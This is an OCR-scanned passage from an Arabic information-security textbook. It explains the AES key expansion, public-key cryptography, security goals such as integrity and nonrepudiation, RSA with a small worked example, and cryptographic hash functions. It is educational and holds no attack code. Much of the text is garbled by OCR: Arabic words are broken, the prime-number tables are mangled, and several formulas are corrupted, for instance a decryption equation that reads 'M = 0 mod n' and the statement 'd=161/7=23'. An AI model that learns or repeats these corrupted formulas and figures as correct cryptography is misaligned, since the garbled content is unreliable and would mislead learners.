مايل شكل توضيحي للإجراء الحاصل بين ال State‏ وال 1 Round key‏ حيث يتم أخذ كل عمود من ال State‏ 
وعمل XOR‏ له مع العمود ull‏ له في ال Key‏ 
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نقوم بتكرار هذه ال Round‏ لتسع مرات. ثم في ال Round‏ العاشرة تُطبق هذه الخطوات Laf‏ باستثناء الخطوة الخاصة 


بال .MixColumns‏ 
لقد وصلنا لنهاية ال «Encryption process‏ هيا لننتقل إلى ال Po Key Expansion‏ به هذا ال .Cryptosystem‏ 


Key Schedule 
16 bytes من‎ 3 SG وهو عبارة عن مصفوفة‎ Cipher Key بأخذ ال‎ "Key Expansion Algorithm" تبدأ هنا ال‎ 


لتقوم cob‏ شىء أشبه ب bytes i Linear Array‏ 176. 
وبقسمة ال 176 على 11 یکون الناتج 6 بمعنى Lal‏ سنستخدم مصفوفة مكونة من dm » 1 de 16 bytes‏ 
وهی ال Rounds‏ المطلوبة!. Jd tu «(Initial round + 10 rounds)‏ ال Cipher Key‏ آول key‏ 3( هذه ال 


.Keys ثم کون منه بقية ال‎ initial round ليتم استخدامة في ال‎ linear array 


هيا لنبداً!.. 


تأمل معي الشكل التالي: 
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Cipher key 


92 |o«|os [10 |20| so 80] 15] 36 | 
[00 | o0 00100 00 00/00/00] a0 


[ooo [oo 6 [eo [oo [o oo 00] 09| 
[ooo [oo 06 oo [oo o oo o | 


Figure 5 


يَظهّر UJ‏ ال Cipher Key‏ كأول مَصفوفة في هذه السلسلة وثلاحظ بالأسفل جَدول OS‏ من عَشْرّة أعمدّة» وهذا 


da‏ على أننا سنستخدم عمود من هذه الأعمدة Round Key IN‏ من العشرة. 


ثم تأتي هذه المرحلة: 
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F‏ و 
حيث نطلق 


j 


ول عمود من ال y‏ 


gat Round Ke‏ بال Wi"‏ فيكون العمود الذى 


Fm‏ وو 
Mee‏ 


“Wie‏ کا يظهر 


St 


6 بعدها بتطبيو خطوات» 


(figure 6) Sts! 


سنقو 


^ 
e 


تكرارها عند 


£ 


تكوين أول عمود من کل Læ Round Key‏ !. 


هذه الخطوات تكون على هذا النحو: 


Wi-1 Wi 


7 oa واا‎ fols j< 
+ 4 
Gja " 


" ا‎ Aas 


Figure 6 
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الخطوة الأولى هي أن نأخذ أول byte‏ في هذا العمود وهو )09( ونضعة بالأسفلء ما يؤدي لازاحة رأسية للبقية إلى 
الأعلى» کم ألاحظ في العمود سل Ga‏ ال Wi-‏ في الشكل الماضيء رقم 6 )6 (figure‏ 

والخطوة الثانية هي تبديل كل byte‏ من هذا العمود بقيمة أخرى من ال S-Box‏ الذي تكلمنا عنه مُسبقاء كنا تُطلق 
(ere ."SubBytes" Ke‏ يوضح الشكل رقم 6 )6 (figure‏ ال :5-80 وعملية ال .SubBytes‏ 


Wi-4 Wi-1 Wi 


ay) oo em‏ اا 
Daal © [oo‏ 
00 


Rcon(4) 


Figure 7 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومارند‎ 


واخطوة الثالثة هي XOR foe‏ لهذا العمود مع كل من ال ۷1-4 والعمود الأول من ال Reon‏ کم يظهر في الشكل 
رقم 7 )7 (figure‏ في الصفحة الماضية. ومذا نکون قد انتهينا من اول عمود (à‏ ال 1 ‘Round Key‏ 


كيف سنکمل بقية الثلاث أعمدة؟ 

XOR ثم تقوم بِعَمّل‎ (Wi) وهو الطلوب تكوينه. لذا سنسميه‎ round key 1 على العَّمود الثاني في ال‎ as Lae 
(Fig.8) 8 أعمدة کا بالشكل التالي» رقم‎ HL بين العمود الذي يَسبقة مُباشرة والعمود الذي یسبقه‎ 
-Round Key 1 ال‎ JESI مع العمود الثالث والرابع. لنصل بهذا إلى‎ XOR وهكذا نكرر هذه ال‎ 


Wi-1 Wi 


Figure 8 


ثم تبدأ ال 2 Round Key‏ سنتکلم عن خطوات تكوين أول عمود بها: 
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فتقوم بتكرار الخُطوات التي تمت عند تكوين أول عَمود في ال 1 Round Key‏ هل تتذكرها؟ 
* أول خطوة كانت ال RotWord‏ وهي نقل ال Byte‏ الأعلى إلى أسفل. 
" والثانية كانت ال SubRows‏ باستخدام ال „S-box‏ 
* والثالثة هي عملية ال XOR‏ بين هذا العمود و ال Rcon‏ وال .Wi-4‏ 
تظهر الخطوة "الثالثة" في الشكل التالي.. (9 (Figure‏ . وها نکون قد انتهينا من أول عمود في ال )2 (Round Key‏ 
Wi-4 Wi-1 Wi‏ 


Figure 9 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومات‎ 


وهذه أيضاً بعض الصور التي توضح هذه الخطوات بأسلوب جيد: 


[Key Exponsion: Port | 


1 need lots of keys for use in later rounds. T derive all 
of them from the initial key using a simple mixing 
technique that's really fast. Despite its critics,” its 


good en ough. 


EEE 
IAEA 
EBAS | 
[a7 [+a [4f [11| 


#0 


۰ By for. most complaints against AES's design focus on this simplicity. 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومات‎ 


[Key Expansion: Part 2a | 


1 take the last column of the previous round key 
and move the top byte to the b 


ottom: 


QNe«. 1 run eoch byte through o substitution box 


thot will mop it To something else: 


f 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومات‎ 


| Key Exponsion: Part 2b | 


91i then xor the column with a ‘round constant 
that is different for each round. 


Finally, I xor it with the first column of the 
previous round ke : 


New first 
column 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلوماءت‎ 


|Key Expansion: Part 3| 


The other columns are super-eosy," J just xor the 
previous column with the some column of the 
previous round key. / 


5 


new column 


Column from 
previous 
round key 


previous 
column 


* Note that 256 bit keys are slightly more complicated. 


إلى هنا نکون قد وصلنا إلى ale‏ هذا ال .Cryptosystem‏ سننتقل إلى dle‏ ال «Asymmetric Cryptography‏ 


هيا بنا.. 
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Asymmetric Cryptography 


يُطلّق “Public Key Cryptography” Lal ade‏ ونعنى به: 
"تشفیر البيانات باستخدام مفتاحين لكل شخص NX‏ من مفتاح واحد للتشفير وفك التشفير"!. ستقوم ال 
La Algorithm‏ پاستخدام Keys‏ 2 لكلا الطرفين المستركين في قناة الاتصال» geal‏ الأول (Public Key)‏ پستخدم 
في عملية تشفیر البیانات قبل GL!‏ للطرف الآخرء والثاني (Private Key)‏ پستخدم لعملية فك تشفیر البیانات 

القادمة من الطرف الآخر. 
لنوضح الصورة أكثر.. 
هم في الحقيقة آربعة مفاتیح.. مفتاحین لكل طرف: 


Sender Receiver 


جام ]| 


Encryption Decryption 
Algorithm [C | 3 Algorithm 


Receiver's 
Private Key 


Receiver's 
Public Key 
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فكل منا سيقوم بعمل Public and Private Keys J Generate‏ سير سل d‏ ال Receiver‏ ال Public Key‏ الخاص 

به لأقوم UT‏ بتشفير البيانات التي أريد إرساطا له. 
وأنا أيضاً سأرسل له ال Public Key‏ الخاص JS bits cy‏ منا بال Private Key‏ الخاص به لنفسه!ء UN‏ 
هذا يسبب وجود BIE‏ رياضية بين المفتاحين» مکن لل Private key‏ من فك الرسالة المشفرة بال .public key‏ 


هذا شكل آخر يوضح هذه العملية بشيء من التفصيل: 


Source A Destination B 


Encryption Decryption 
algorithm algorithm 


Key pair 
source 
A الخاص به للطرف ۸ کي يقوم‎ public key ال‎ dus eb ckey pair لل‎ generate يقوم بعمل‎ B يظهر أن الطرف‎ 
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دعني أطرح عليك سؤالاً منطقياً بعد أن تعمقنا في تكنولوجيا التشفير هذه!. 

ماهو ادف من التشفیر من الأساس؟ أو ماهي الخدمة التي يقدمها UJ‏ ال ¢..Cryptography‏ 
انه سژال مهم فعلاً!. 

هذه التکنول و جیا تقدم لنا فوائد عديدة» سأذكر لك آهم آربعة آهداف Lia.‏ نا 


Confidentiality 
التي تنتقل بينهم ستكون‎ Data و أن ال‎ CAST تعني الموثوقية» وهي التي تضمن السرية أثناء التواصل بين شخصين أو‎ 
معزولة عن المحيط الخارجي» ومحفوظة السرية.‎ 
مثال على ذلك "الشهادات المدرسية" أو كشف درجات الطلاب والخريجين. حيث يضمن المعهد أو الجامعة أن هذه‎ 
يجب أن‎ Proof عليها إلا الطالب نفسه» وأولياء أمره» وحل عمله أو دراسته الجديد!. وبالتالي فهُناك‎ dar البيانات لا‎ 
من قبل الجهة أو الشخص الذي يريد نسخة من هذه الملفات!.‎ eX 
مايل تعريف ختصر ضا:‎ 

Is the protection of transmitted data from “Passive Attacks” 

ماهذا ال Attacks"‏ Passive“..؟‏ 
نها عملية الإطلاع على ال Data‏ التي يتم انتقاها بين طرفين. 
يلخص هذا المفهوم الشكل التالي: 
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read contents of 
message from Bob 
to Alice 


Darth 


Internet or 
other comms facility 


Alice 


Integrity 
نعنى مها "سلامة البیانات " أو ما یل:‎ 


Integrity Assures that messages are received as sent with no duplication, insertion, modification, 
reordering, or replay. 


ماهذا ال "Replay"‏ 
إنه نوع من ال Attacks‏ المصنف تحت ال «Active Attacks‏ فهو ON Active‏ ال Attacker‏ سيقوم بعمل تعديل على 


هذه ال data‏ ویعید إرساها مر أخرى!. 
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Darth Capture message from 
Bob to Alice; later 
replay message to Alice 


Authentication 


x £ 


هذه ببساطة عملية التحقق من هوية الأشخاص أو الأجهزة أو أي شيء!. 
مايل مثال لهذه العملية: 
“Hi, I'm Bob!”‏ 


"" 


"Prove it. Encrypt 'apple. 


"elppa" 


"Hi Bob, good to talk to you again." 
—— سس سس‎ 
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لاحظ أن ال Server‏ عندما طلب من السيد بوب أن يثبت هویته طلب منه شيء بعينه» ربا يطلب منه Password‏ 
Lal‏ كنوع من إثبات الهوية» فمعنی أنه يطلب منه شيء بعينه أن هذا ال est Server‏ بتطبيق علاقة .."Compare"‏ 
سيقوم بمقارنة قيمة محددة عنده با سيّدخلة هذا ال cuser‏ فان تطابقاء سیعطیه ال „access‏ 

.! “Identification” تختلف عن ال‎ Ul 

فالثانية هذه تعني الاتي: 

عندما تقوم بإدخال إسمك See‏ فيقوم هو بمقارنة هذا الإسم بكل الأساء التي لديه إلى أن يحدّث match‏ إنها fà]‏ 


علاقة من نوع .“One-to-Many”‏ هذا آشبه بعملية ال Search‏ 


. “One-to-One” علاقة‎ p Authentication ال‎ (iıı 


بمعتی: (Compare only, No search.)‏ .. في الصفحة التالية نعرض بعض آشکال ال Authentication‏ .. 
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E 94328 


XYZ Inc. SN£ 
Zh Keychain USB 


-EM ۱-۱۶ ۷ 


۱-۸ 


Fingerprint recognition 


Palm of hand 


Nonrepudiation 

provides assurance to the recipient that the message was actually originated by 

the sender and not someone masquerading as the sender. It prevents the sender from claiming 
that they never sent the message in the first place 


"1t prevents ether sender or receiver from denying a transmitted message" 
$..Masquerading ماهذا ال‎ 
وكأنة‎ Data بانتحال شخصية آحدهم وإسال ال‎ Attacker الذي یقوم فيه ال‎ Active Attacks إنه نوع من آنواع ال‎ 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلو ما رنه‎ 
€ € » v 


هذا شكل يوضح ال :Masquerading Attack‏ 


Darth Message from Darth 
that appears to be 
from Bob 


Internet or 
other comms facility 


(a) Masquerade Source: Ref (7) 


Symmetric Cryptography ال‎ LJ ها‎ n پر‎ Y -Nonrepudiation- هذه الخاصية‎ 


لأنه ببساطة أي شخص يمتلك هذا ال Shared Secret Key‏ سيتمكن من تشفير الرسالة وإرساها لي!. 


Because any communicating party can encrypt and decrypt messages with the shared secret key, 
there is no way to tell where a given message originated. 


والآن..هيا لنعود ie 218 js‏ إلى ال .Asymmetric Cryptography‏ 
كنا نتكلم عن ال ..Asymmetric Cryptosystem‏ 
وبعرضه على المفاهيم الجديدة التي عرفناها OYI‏ ثلاحظ أنه gad‏ لنا مايلي: 


Confidentiality, integrity, and 0 
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سنأخذ مثال آخر نوضح به تحقيق هذه الخصائص باستخدام ال .Asymmetric Keys‏ 


Source A Destination B 


Decryption 
algorithm 


Message X 
source 


Key pair 
source 


Ga‏ في هذا المثال بإضافة خطوة جديدة وهي أن عملية التشفير أو فك التشفير ستكون على مرحلتين بدلاً من مرحلة 
واحدة!. سيقوم ۸ بتشفير الرسالة Yaf‏ استخدام ال private key‏ الخاص به ثم يُشمْرها by‏ أخرى باستخدام ال 
public key‏ الخاص بالمستخدم 8. تكمّن فائدة عملية التشفير الأولى في توفير خدمة ال A OY «Nonrepudiation‏ 
هو الشخص الوحيد الذي يمتلك ال private key‏ الستخدم في عملية التشفير» فلن يتمكن أحد غيره من تشفير 
الرسالة وادعاء أا قادمة من . وهذا تأكيد على أن هذه الرسالة قادمه من ۸ و A‏ فقط!ء هذا USE‏ إلى توضيح أحد 


“Digital Signature” وهو ال‎ Public Key Cryptosystems تطبيقات ال‎ 
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ماهذا ال $..Digital Signature‏ 
عندما تذهب edd‏ حساب بأحد البنوك edu‏ لك الوظف مجموعة من المستندات من ضمنها مستند خاص بالتوقيع 
أو إمضاء العمیل الشخصی» هذا المستند يتم حفظه في ملفك لديهم. 
;53 أردت إجراء أي تعديلات على حسابك وأنت خارج البلاد تقوم بالإمضاء على طلبك وإرساله إلى البنك 
بالفاكس كإجراء ضمن عدة إجراءات» فيقوم الموظف بفتح ملفك Gli‏ هذا الإمضاء بذلك الذي بالملف!. هذا 
الأمر يتشابه مع مفهوم digital signature‏ غير أن الأخيرة تستخدم الکترونی لكن وظيفتها لا تقتصر على کونا جرد 
امضاء!» فهي تقدم لنا خدمات ‘Lal c‏ 

Digital signatures can provide the added assurances of evidence to origin, identity and status of 


an electronic document, transaction or message, as well as acknowledging informed consent by 
the signer. 


سناتي إليها بشيء من التفصيل فيم|بعد.. 


بینا سنذهب الآن في جولة de Ax‏ أحد ال “Public Key Cryptosystems"‏ 


وهو السیّد “RSA”‏ الْحرّم. 


RSA 
MIT تشير تسميته إلى الثلاثة الذين قامو بابتكار هذا النظام وهم ينتمون لمعهد ال‎ 
Ron Rivest, Adi Shamir, and Leonard Adleman at MIT 


شکراً هم ©. 
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Understanding Hacking and Information Security الإلكترونية ماهن المعلوها رنه‎ ism sall 


aed‏ معاً شکل هذا النظام: 


Bobs's 
public-key 


Joy 


Ted T 


Mike Alice 
PU, | Alice's public PR, Alice's private 
key key 
Ce 

Transmitted X= =‏ حت 

= Xx —— eim _ تن‎ D[PR,, Y]| = 

T Y = E[PU, C 
Plaintext Plaintext 

moa Encryption algorithm Decryption algorithm asa en 

(e.g., RSA) ی سور پس سم پا‎ 
Bob (a) Encryption with public key Alice 


يريد السيد Bob‏ إرسال رسالة إلى «Alice‏ فيستخدم ال Public Key‏ الخاص بها لذلك. فتقوم هي بفك الشفرة 
باستخدام ال Private Key‏ الخاص ما. 

Ww‏ أب أن أوضح لك أن أي من ال Keys‏ يُمكن استخدامة في عَمّلية ال «Encryption‏ ويستخدم ال Key‏ الآخر 
في عملية ال .Decryption‏ كان هذا المثال للتشفير باستخدام ال Public Key‏ وقك التشفير بال .Private Key‏ 
سنشاهد مثال آخر یوم بعکس عملية استخدام ال ‘Keys‏ 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومارنه‎ 


Alice's 
public key 


Bob's private PU, | Bob's public 
key key 


سس تسم 
y Transmitted 27 ae SS‏ |= 
ee um‏ — = 
— و -| کت 
i Plaintext‏ 
A Encryption algorithm Decryption algorithm n x‏ 
(e.g., RSA)‏ 
Bob (b) Encryption with private key Alice‏ 


يظهر هنا السيد Bob‏ وهو 22 رسالته بال Private Key‏ الخاص به هی 33 تقوم EÓ Alice‏ الشفرة باستخدام ال 


Public Key‏ الخاص به آیضا. 


هيا لنتعمق داخل ال -IRSA Algorithm‏ 
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RSA Algorithm 


سنقوم بشرح هذه ال Algorithm‏ على ide‏ خطوات: 
أول خطوة هي اختیار عددین عشوائیین» کببرین» ۳ ختلفین» و"أوليئن". 


uL‏ لهم ب: 
qp‏ 


Choose two large prime numbers (approximately 200 digits each), labeled p and q 
¢..Prime Number ما هذا ال‎ 
هذا يدفعنى لأحكى لك هذه القصة:‎ 


“A brilliant young mind” كنت أشاهد فيلم اسمة‎ 


A. 


158 7 who 
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f ۾‎ 


Jle بالاهتام به» وتأهیله لخؤض مُسابقاتٍ دولية في‎ iol قصة طفل يمتلك عقلية رياضية تُتارّة!» وكيف بدأت‎ SÉ 
الرياضيات..‎ 

ليو 

ذات يوم ذهبت Al‏ لتشتري له وجبة الغداء ويبدو أن هذا ALM‏ كَانَ يُسمّي OLE I‏ بأرقام» فطلبّت السّيدة الوجبة 
رقم "47" وهو رقم du d‏ لکنها آرادت إجراء تعدیل على عدد القطع بداخل هذه الوجبة لتکون عددها "ول" 
أيضاً!. Jus‏ ها الكاشير أنه من الأفضل ها أن تأخذ الوجبة رقم ”48“ لاحتوائها على الطلوب؛ 

فترددت السيدة قليلاً وقالت له: 

"اعذرني فولدي لديه طباع غريبة بعض الشيء.. إنه لن بل إلا الأرقام الأولية!" 
من شّنطتها لتتأكد هل الرقم 48 أولياً أم لا.. 

ثم أرادت أن ثُريه أنه ليس أولياً كا يبدو في الصورة بالأسفل» فارتسمت على الكاشير ملامح الإندهاش كا يظهر. 


A 
048 


آخرجت جَدوّل الأرقام الأولية 
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القرصنة الإلكترونية galg‏ المعلوماءه 


Understanding Hacking and Information Security 


NCC d 0 ااا ا ا ا ا‎ OEC 

| 5821 | 9611| 6901| ese | zes | exe | 199 | evs | eoe | eve | uz | zer | ce | 
| 621 usw | 901 | ue | eve | ex | oso | us | 19r | sx | ec | ist | 16 | 
sr[srpwerpon wwe us ew] mcs» ur[uw]| ex | ee | wr | & 
sr | esri | erer | oser | un | isor | 296 | zs | 089ل | كل‎ | oos | ev | ese | usc | eet | ec | 
sr | terr | coe | over | eorr | eror | eso | ese | 1st | cro | eos | em | erc | ise | er | or 
Leet | teer | cect | eer | 6601 | ۳6 | oes | evt | n9 | uss | oer | cre | wc | ter | © | 
Gert | caer | tect | ren | eeor | 196 | oze | ez | we» | cvs | cer | zee | oc | zt | © | 
sert | 1261 | 6621 | su | reor | ze | zm | eec | 619 | ws | 1er | wee | eec | en | n | 
[erst | 6201 | ener | seer | eur | 1201 | eze | exe | uz | فا‎ | ees | ter | zc | se | oo | 2 | 
rest | zerr | coer | zar | zur | 6101 | 656 | ws | eu. | er | vs | ow | er | 2 | wv | s | 
Fer cert | coer | erer | eorr | eror | 116 | ris | 606 | zo | eos | oor | me | ez | cor | ؟‎ | 
[usr | oor | 1061 | 1020 | corr | 6001 | zoe | 608 | 104 | 109 | eos | 108 | zx | nz | 10 | c | 


Loo 


m 
S 
3 
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امحدول السابق يوضح الأعداد الأو لية التي تقع أسفل الرقم ”2000“ 


ولكن لم تُجب على السؤال!.. 

كيف يكون العددين أوليين فما بینهما من الأساس؟ أو كيف نحکُم أن هذان العددان أوليان فيا بينهم؟ 

خسنا هذا هو التعریف أولا: 

في نظرية cle MI‏ یکون عددان صحیحان cud sl‏ ف[ بینها :(Coprime integers)‏ 

عندما يكون القاسم المشترك الأكبر gy Greatest Common Divisor (GCD)‏ والذي يمكن إيجاده باستع‌ال 


خوارزمية اقلیدس, مساوياً للعدد )1( 


وما هذا القاسم المشترك الأكبر؟ 
eed ode TG‏ في تفس الوقت العددين مَعاً بدون أي BL‏ قسمة. EŠ‏ للعددين (48 و 60(« سيكون 12. 


a Coss‏ هاپس سا GcD sti‏ ليسي این 


جيل هذا الاسم.. إقليدس © 


55 


“Euclidean Algorithm 
(7253, 120) لعددين يُفترّض أن يكونا أوليين فا بينهم» وهم‎ GCD هذا مثال يوضح طريقة حساب ال‎ 
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7253 120 53 
120 53 14 
53 14 11 
14 11 3 
11 3 2 
3 2 ] 
2 1 0 


تتلخص الطريقة بوضع العدد الأكبر أولاً ثم قِسمّته على العدد الأصغرء ووضع باقي XLI‏ الخانة SR‏ تقوم 
بتقل العدد الأصغر تحت الخانة Ji A‏ ال ۸ الأول تحت B E‏ & قسمة ال 120 على ال 53 ووضع الباقي مره 
أخرى تحت الخانة R‏ ثم إجراء عملية النقل ثم القسمة ووضع الباقي وهكذا.. إلى أن نصل إلى (2 = 1/ 2(« وهذا 
يعني أن الباقي بعد القسمة = صفر!. 

فيكون ال GCD‏ هو قيمة ال 1 التي تسبق الصفر Ls‏ 5 فإن كانت هذه القيمة = ۰1 فهذا يعني أن هذان العددان 


أوليان. 


لنعود.. 

قلنا أن أول خطوة هي اختيار عددين أوليين. 
والخطوة الثانية هي حساب قيمة N‏ حيث q‏ . م N=‏ 
ما هذا ال "م"..؟ 
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إنه عدد سيتم استخدامه "'كمعامل" أثناء التشفير وأثناء فك التشفی أي & 0 في مُعادلة ال «Public Key‏ وال 
gl) .Private Key‏ إليه بعد قليل..). 

“Euler’s totient function, ®(n)” والثالثة هي حساب ال‎ 

ويتم تعريفها على Ll‏ عدد الأعداد الصحيحة الموجبة التي تقل عن العدد ۰ وتحقق هذا الشرط: 


"they should be relatively prime to n" 
دعنا نأخذ مثال:‎ 

رید حساب قِيمّة )29( 

dol 202 29 saat SF lp 

إذاً.. $2 القول بأنَّ: 28 = )29( بعنى أنه: 


O(n) 2 0-1‏ 
وهذا فقط للأعداد الأولية! 


Ob القول‎ EX ۰۵00, q) كانت في الأساس‎ s O(n) ol وبا‎ 
O(n) = d(pq) = Dp) * Pq) = (p - 1) * (q- 1) 
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ات ب العدد 15 

نا الجدول بالأعلى أن 8 = )15( لاحظ أن 15 ليس عدداً Lu‏ فلا تقول هّنا 14 = (0)15. $ a‏ لهذا ال 15 أن 
يكون حاصل ضرب لعددين أوليين كي نحقق شرط المعادلة. 

هيا لنختار آي عددين cil sl‏ حاصل ضریهم = 15 

تجد ol‏ العدد 3 والعدّد 5 عَدَدين أولييّن وحاصل Lad 15 = ee pd‏ 

لنطبق العادلة: 


O(n) = (pq) = Pp) * Dq) = (p - 1) * (q- I) 
$(15)20(5,3)-(5-D * (3-1) =4*2=8 


يدو ajo Ventas oul‏ لا ا 
لا تقل نی ele‏ العدد 25.. هل تعرف السبب؟ 
لأن في هذه احالة سیکون ال 5 = cp‏ وال 5 = و آیضاء وهذا BE‏ للشّرط في أن یکونا Noah?‏ 
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18 stall لنجرب‎ 
021( = 07, 3( < 0 - 1( * (3-1) =6 *2=12 


أظن آننا قد فهمنا الخطوات السابقة جیدا!. 

والان وبعد حصولنا على ال (n)‏ سنقوم باختیار العدد (e)‏ بحيث SAŻ‏ شرطين هم: 
- أن يقل هذا العدد عن العدد P(n)‏ 

- أن یکون SS‏ من ال (e)‏ وال (n)‏ آولیین lè‏ بينهما!» 


كيف هذا؟ 

حسناً.. So‏ أن ال 160 = (8)8.. فنقوم باختیار عدد عشوائي fol‏ من ال 160. 
ستجرف Sal‏ عل سيل JU‏ 

باستخدام ال "Euclidean Algorithm"‏ لاختبار العددين كما GCD (160, 7) : b‏ 


تجد أنَ ال1 = GCD‏ 


هذا جيد.. ولكن ماذا سنفعل lip‏ ال (e)‏ ..€ 
سَنستخدمه في مُعادلة التشفير كا يل: 


لتفرض أن الرسالة اراد تشفيرها هی «M‏ والرسالة المشفرة ستكون «C‏ فتكون المعادلة: 


Cryptography 
[351] 


C = M° mod n 
M = 0 modn 


هل Sis‏ هذا ال $..(n)‏ 

تكلمنا عَنْهُ في الخُطوة الثانية وأخبرناك آننا سنستخدمه في عَمَلية التشفير وفك التشفير!. 

وهذا S‏ ال plaintext‏ الذي Tre‏ إرسالة على هيئة «(Blocks)‏ كل Binary value Jaz block‏ 
أقل من هذا العدد «(n)‏ بمعنى أن هذا ال ciphertext‏ ستکون قيمته بين الصفر وال (n - D)‏ وعلى أي حال» هذا ال n‏ 


لن تزيد قيمته عن )241024( "إثنين مرفوعة للأأس 1024". 


ZL,‏ على هذا الكلام.. يبدوا واضحاً نا الاني: 

. أن العدد ١‏ لابد أن یکون معروفا لكل من ال Sender‏ وال Receiver‏ 

. وأن العدده معروفاً للمُرسل» فهذا Eu‏ ال Public Key‏ الذي سیستخدمه للتشفیر. هذا ال Key‏ الذي سیعطیه 
إياه المستقبل. 

. والعدد d‏ معروفاً للمُستقبل» هذا سيكون ال pisti Private Key‏ في ÈG‏ الرسالة à Adi‏ 


في الصفحة التالية شكل تحليلي يوضح جميع المخطوات السابقة: 
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Understanding Hacking and Information Security 


Blocks of numbers 
Py, Pae . 


Ciphertext C 


C, =P, mod n 
C; - Pj; mod n 


Recovered 
decimal text 
P, = Cj mod n 
d = e! mod ó(n) P,- Cj! mod n 
ó(n) = (p - 1)(q - 1) 
n=pq 
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2slagleall aly القرصنة الإلكترونية‎ 


Source: Ref [7 


بناءٌ علی الشکل.. یبدا ال Generator‏ بإنتاج ال e‏ وال p‏ وال oq‏ ثم يتم حساب ال a‏ وإرسال هذا ال e‏ وال 
n‏ للشخص الذي يريد إرسال الرسالة المشفرة إليه» حيث يتم استخدامهم في معادلة إنتاج ال (S Ciphrtext‏ 


تری في الخطوة الثانية. 
A‏ الثالثة يقوم فيها ال Sender‏ بتجهیز ال aL plaintext‏ تشفيره وإرساله. 
وني الخطوة الخامسة يتم استخدام العادلة التي دّكرتها لك من قبل في التشفير. 


ثم في الخطوة السادسة يتم تجهيز ال private key‏ الذي سيستخدمه ال Receiver‏ من أجل فك الرسالة 
المشفرة باستخدام المعادلة الثانية التي يدخل فيها ال (d)‏ 


ولكن لم تقل لي كيف حصلت على هذا ال (0)..؟ 
هذا صحيح!.. سأخبرك كيف نحصل عليه في الثال التالي» والذي سنختم به هذا ال “RSA”‏ 


أولاً: سنقوم باختيار العددين الأوليين» 11 -0 and‏ ,17 = م 


(n = 187( ..إذاً‎ (n = و * م‎ = 187) «n سنقوم بحساب ال‎ at 


الثاً: سنقوم بحساب O(n)‏ على هذا النحو: 
P(n) = (pq) = Pp) * D(q) = (p- D * (q- 1) = 16 * 10 = 160‏ 
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e is relatively prime to n, and e is less than D(n). then.. e is (7) 


خامساً: هذه Sla‏ لتحدید العدد (d)‏ والذي Za‏ عن ال Private Key‏ الْمستخدّم في فك الرسالة AI‏ 
: نحصا عليه با 1 ستخدام هذه المعادلة: 
(ed — 1) mod (p- 1)(q— 1) =0‏ 
e * d= O(n) +1‏ 


7*d=160+1 
d=161/7=23 


Lasta‏ سنقوم بإعطاء الطرف الآخر ال Public Key‏ وهو ال «(e)‏ وسنقوم بالاحتفاظ UJ Private Key JL‏ فقط 


سابعاً: يقوم ال Sender‏ بتشفير الرسالة وهی )88( وإرساطاء ويقوم ال Receiver‏ باستقبالها وفك تشفيرها 


با x.‏ ستخدام هذه المعادلاات: 


C = M* mod n 
M = 04 modn 
هذا النحو:‎ de 
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Encryption Decryption 


. Ciphertext 
Plaintext 11 


58 


Plaintext 
88 


1 nodD- 88 


PU = 7, 187 PR = 23, 187 


إلى هنا نكون قد انتهينا من ال RSA‏ 


Cryptographic Hash Functions 


ماهذا ال .*Hash Function"‏ . ؟ 


إا Function‏ تسمیها (H)‏ تأخذ input‏ وهو النص 3l ÍI‏ إرساله (M)‏ لتقوم بإنتاج output‏ بحجم ثابت: 


.(h) پس ا‎ “Fixed-size hash value” 


هيا لنعيد كتابة هذه المعادلة: 
h = H(M)‏ 
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L bits 


Message or data block M (variable length) 


Hash value h — 
(fixed length) EZ] 


P, L = padding plus length field 


هذه ال Hash function‏ حسّاسّة 544 46 عالية» فأي تَغيير يم إجراؤه على النص gog «M)‏ إلى تغيير مُقابل له ني ال 
.Hash Code‏ 
هذه هی الخاصية الرئيسية التی تتميز ما ال .Hash Functions‏ 


وماذا سنستفيد من هذه الخاصية؟ 
نستفيد منها في التأكد من أن النص أو الملف الذي يجري إرساله لم يتعرض لأي تعديل أثناء رحلته!. هذا الكلام يبدو 
مألوفاً!ء أليس كذلك؟ 
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5 : .2 
هل تتذکر تعریف ال "Data Integrity"‏ $ ..دعنی أذكرك به: 


Integrity Assures that messages are received as sent with no duplication, insertion, modification, 
reordering, or replay. 


والآن هل عرفت فائدة ال "Cryptographic Hash Functions"‏ ؟ 
s]‏ أحد وسائل تحقيق ال .Data Integrity‏ 
توجد بعض السات الأساسية لل :Cryptographic Hash Functions‏ 
* الأول أن ال input‏ غير ثابت» آي أن ال 4X5 input length‏ . 
" والثانية أن ال output‏ سیکون Fixed-Size‏ 
* والثالثة أن هذه ال “One-way function” E Hash Function‏ وهذا يعني آنه 
یصعب بشدة معرفة ال input‏ من خلال الإطلاع على ال .loutput‏ 


«Collision free” Lb n di, *‏ بمعنی أنه من الستحیل حدوث تطابق بين أى „hash values‏ 


“it is incredibly difficult to find two pieces of data that hash to the same value, and the chances 
of it happening by accident are almost 0”. 


Message Authentication 
“Hash Function” أحد تطبيقات ال‎ Message Authentication ال‎ 35 


حيث تُستخدم للتأكد من ال integrity‏ الخاصة بالرسالة أو البيانات التي يتم إرساهاء وعندما تقوم باستخدام ال 


"Message Digest" تطلق عليها‎ 2 pl لهذا‎ Hash Function 
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فا هو تعريف ال §..“Message Digest”‏ 


“Ts the action of generating a unique output value derived from the content of the message" 


لاحظ OE‏ الرسالة لن تتحول إلى هذا ال hash value‏ ستظل الرسالة كما هی.. 
سيتم فقط إضافة شىء مثل go notepad‏ الرسالة ہا هذا ال „hash value‏ 
ويقوم jad‏ بتطبیق نفس ال Hash Function‏ على «JL. JI‏ فینتج chash value‏ يقوم بمقارنته بذلك الذي اتی 


الر LL‏ فان تشاماء فهذا د سلامة هذه الرسالة أو الملف مر: أى تعدیا أو حذف أو ضياء لاحد أجزائه. 
مع : cue‏ فهدا دلي من اي تعديل أو و صياع Der‏ 


p 


(a) Use of hash function to check data integrity 


؟..“Man‎ in the middle attack" هذه الرسالة لل‎ oo oM هل‎ 


هذا مکن بالطبع !.. 
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Understanding Hacking and Information Security المعلوما ره‎ aly القرصنة الإلكترونية‎ 


كيف ذلك؟ 
بأن يتمكن أحدهم من الإمساك بالرسالة قبل وصوها إلى ال elici receiver‏ عليها ثم يقوم بتطبيق ال MDS‏ مثلا 
